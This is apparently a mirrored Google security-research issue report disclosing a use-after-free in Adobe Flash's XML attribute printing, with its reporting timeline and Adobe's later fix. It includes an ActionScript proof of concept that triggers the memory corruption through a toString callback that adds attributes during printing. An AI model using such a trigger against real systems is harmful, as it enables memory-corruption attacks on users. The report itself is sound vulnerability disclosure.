search

sla-cker / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free when printing XML Attributes #366

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago 
If an XML attribute is set to an object that has toString defined, it can lead 
to a use-after-free condition if the toString function adds many attributes to 
the XML object while it is being printed. This happens because adding extra 
attributes eventually causes the buffer that contains the object variables to 
be reallocated. 

A minimal proof of concept is as follows:

var doc:XML = new XML("<mytag name='Val'> item </mytag>");
trace(doc.firstChild.attributes.name); // Val
trace (doc.firstChild); // <mytag order="first" name="Val"> item </mytag>

var n = {toString : s, valueOf : s};

for (attr in doc.firstChild.attributes) {
    trace (attr + " = " + doc.firstChild.attributes[attr]);
}

var q = doc.firstChild.attributes;
for(var i = 0; i < 100; i++){
    q[i] = "t"; // Make the var buffer big, so it doesn't immediately get reallocated as a simple object (which zeros its values)
    }
trace(doc.toString());
doc.firstChild.attributes.natalie = n;
trace(doc.toString());

function s(){

    trace("hello");
    doc.firstChild.attributes.order1 = "a";
    doc.firstChild.attributes.name2 = "a";
    doc.firstChild.attributes.natalie1 = "a";
    doc.firstChild.attributes.order3 = "a1";
    doc.firstChild.attributes.b = "a2";
    doc.firstChild.attributes.order;
    var q = doc.firstChild.attributes;
    for(var i = 0; i < 1000; i++){
        q[i] = "t";

        }
    return "myString";  
    }

A sample swf and fla are attached. This PoC only works on 64-bit Linux 
(probably due to pointer size affecting what gets reallocated in the freed 
area), but the use-after-free condition should occur on all platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 5 May 2015 at 11:38

Attachments:

GoogleCodeExporter commented 9 years ago 
This is PSIRT-3656

Original comment by natashe...@google.com on 6 May 2015 at 7:08

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:31

GoogleCodeExporter commented 9 years ago 
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 3 Aug 2015 at 9:42